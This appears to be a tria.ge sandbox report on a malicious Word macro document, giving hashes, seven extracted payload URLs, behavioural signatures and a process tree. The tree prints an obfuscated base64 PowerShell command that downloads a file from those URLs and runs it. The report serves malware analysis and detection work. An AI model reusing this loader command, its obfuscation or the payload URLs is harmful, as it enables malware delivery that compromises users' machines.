Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
128s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24/08/2024, 16:56
Static task
static1
Behavioral task
behavioral1
Sample
bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc
-
Size
202KB
-
MD5
bf0b0a3501aeb456a2513f8bd43f558a
-
SHA1
b17d1b89ea913666b7eacb2fddad6f1cc045a63a
-
SHA256
00aa2833332261ee444a5437a5ab56474bb743924d2d1be87777f4fa2a1688c5
-
SHA512
cbbdb24c134370184b497dfae451de094ac56e4eacf07f69268347bd81e9e9290536ddcb9b7730a754fc11a76afa263960502d0e701ef1c194ed88001ecdac4a
-
SSDEEP
3072:dUqJ1NgsA8k/gvh0NZ0lGX1nZ7ZYpSgKsiEHE+b64JE:dBtgVIveNZvn6zKjEkc6cE
Malware Config
Extracted
http://bavhome.com/wp-content/td/
http://hercinovic.com/cgi-bin/mZt/
https://jeffdahlke.com/css/3u/
http://calledtochange.org/CalledtoChange/V/
http://daoisthealing.com/cgi-bin/c/
https://scyzm.net/wp-content/j/
http://www.bismarjeparamebel.com/u/pCp/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 208 POwersheLL.exe 84 -
Blocklisted process makes network request 7 IoCs
flow pid Process 6 2572 POwersheLL.exe 13 2572 POwersheLL.exe 16 2572 POwersheLL.exe 26 2572 POwersheLL.exe 40 2572 POwersheLL.exe 44 2572 POwersheLL.exe 52 2572 POwersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4016 WINWORD.EXE 4016 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2572 POwersheLL.exe 2572 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2572 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4016 WINWORD.EXE 4016 WINWORD.EXE 4016 WINWORD.EXE 4016 WINWORD.EXE 4016 WINWORD.EXE 4016 WINWORD.EXE 4016 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4016
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABCADYAdAAwAGcAZwBnAD0AKAAoACcAUABhACcAKwAnAHcAcABnACcAKwAnAHYAJwApACsAJwBhACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBwAFIAbwBGAGkATABlAFwAeABfAHgANQBWAFoAcgBcAEYAOABCAFkAZQBhAE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAYABVAGAAUgBpAHQAeQBgAHAAcgBvAHQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAJwArACcAMgAnACsAJwAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABIAHUAcgBwAGgAdwBpACAAPQAgACgAKAAnAFkAeQAnACsAJwB4ACcAKQArACcAbgBvACcAKwAnADMAJwApADsAJABMAGIAagB5ADAAZAAxAD0AKAAoACcARwBnAHgAJwArACcAbgAnACkAKwAoACcAbQBkACcAKwAnAGoAJwApACkAOwAkAEQAcwA2ADcANgBlAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0AWABfAHgAJwArACcANQB2AHoAcgB7ADAAfQBGACcAKwAnADgAYgB5AGUAYQBvAHsAMAB9ACcAKQAgACAALQBGAFsAYwBoAEEAUgBdADkAMgApACsAJABIAHUAcgBwAGgAdwBpACsAKAAoACcALgAnACsAJwBlAHgAJwApACsAJwBlACcAKQA7ACQAUwA1ADMAaQB1AGMAYwA9ACgAJwBQACcAKwAnADcANgAnACsAKAAnADEAJwArACcAcQBuAGIAJwApACkAOwAkAFYAeQBlAHkAcgBiAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAGIAYwBsAEkAZQBOAFQAOwAkAFoAXwBoADcAXwB4AGEAPQAoACgAJwBoACcAKwAnAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAYQB2AGgAJwApACsAKAAnAG8AJwArACcAbQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAbgB0AC8AJwArACcAdAAnACkAKwAnAGQAJwArACcALwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBoAGUAJwArACcAcgBjAGkAbgBvAHYAJwArACcAaQBjACcAKwAnAC4AJwArACcAYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYwBnACcAKwAnAGkALQBiACcAKwAnAGkAbgAvACcAKQArACcAbQAnACsAKAAnAFoAdAAnACsAJwAvACoAaAAnACsAJwB0AHQAJwArACcAcABzADoALwAnACkAKwAnAC8AagAnACsAKAAnAGUAJwArACcAZgBmACcAKQArACcAZAAnACsAKAAnAGEAJwArACcAaABsACcAKQArACgAJwBrAGUAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0ALwBjAHMAJwArACcAcwAnACkAKwAnAC8AMwAnACsAKAAnAHUALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoALwAvACcAKQArACgAJwBjAGEAJwArACcAbAAnACkAKwAoACcAbAAnACsAJwBlAGQAJwApACsAKAAnAHQAbwAnACsAJwBjAGgAYQBuACcAKwAnAGcAZQAuAG8AJwApACsAJwByACcAKwAnAGcAJwArACgAJwAvAEMAYQAnACsAJwBsACcAKQArACcAbABlACcAKwAoACcAZAB0ACcAKwAnAG8AQwBoAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAC8AJwApACsAJwBWAC8AJwArACcAKgAnACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AJwApACsAJwBkAGEAJwArACgAJwBvAGkAcwB0ACcAKwAnAGgAZQBhACcAKQArACgAJwBsACcAKwAnAGkAbgBnAC4AYwBvAG0ALwAnACkAKwAnAGMAZwAnACsAKAAnAGkALQBiAGkAbgAnACsAJwAvAGMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AJwApACsAKAAnAHMAJwArACcAYwB5ACcAKQArACgAJwB6ACcAKwAnAG0ALgBuAGUAdAAnACsAJwAvACcAKQArACcAdwAnACsAJwBwACcAKwAnAC0AJwArACcAYwBvACcAKwAoACcAbgAnACsAJwB0AGUAJwArACcAbgB0AC8AagAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAOgAnACsAJwAvACcAKQArACgAJwAvAHcAJwArACcAdwAnACkAKwAoACcAdwAuACcAKwAnAGIAaQBzAG0AJwApACsAJwBhAHIAJwArACgAJwBqAGUAcABhAHIAYQAnACsAJwBtACcAKwAnAGUAJwArACcAYgBlAGwALgAnACsAJwBjAG8AbQAvAHUAJwApACsAKAAnAC8AJwArACcAcABDAHAAJwApACsAJwAvACcAKQAuACIAUwBgAHAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGcAZAA5ADgAdABpAD0AKAAoACcAVwAwACcAKwAnAG4AagAnACkAKwAoACcAdABoACcAKwAnAHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAGcAZgB1AG4AYQB3ACAAaQBuACAAJABaAF8AaAA3AF8AeABhACkAewB0AHIAeQB7ACQAVgB5AGUAeQByAGIAYwAuACIARABvAGAAVwBgAE4ATABPAEEAZABmAGkAYABMAEUAIgAoACQAVQBnAGYAdQBuAGEAdwAsACAAJABEAHMANgA3ADYAZQBvACkAOwAkAFIAbQA5AHUAdwB0AGUAPQAoACcAWgAnACsAJwA2ACcAKwAoACcAYwBjACcAKwAnAGkAYQB3ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEQAcwA2ADcANgBlAG8AKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAzADcAOQA5ADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAoACQARABzADYANwA2AGUAbwApADsAJABFAGQAZwBfAG0AbwBoAD0AKAAnAEEAJwArACcAbgAnACsAKAAnAHcAMQAnACsAJwA0ADcAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAVABiAGUAcAByADUAMgA9ACgAKAAnAFMAJwArACcAMABjACcAKQArACgAJwBxAGYAdAAnACsAJwA3ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAGUAbQBlAHMAZABuAD0AKAAoACcAVAAwAHcAZgAnACsAJwBzACcAKQArACcAeQBnACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD5c7a11cf0bd9a16fe2c6b0fe7fa64086c
SHA13fb9c4f2f9157d891c9247da12d811e3d02cf98f
SHA2569224ecae50a185e5bc3e53b8cd7d76a748930fac714b23cbd9a491074ef815e6
SHA5123b7bed291e02817a57cfaf1a32005fcf2800c929de1b5eaa403224e2208b15dbf8b64febff38c6d7cef6b563202f6bb02ebe0c4b5863c85ac1dd2f8797bba4d0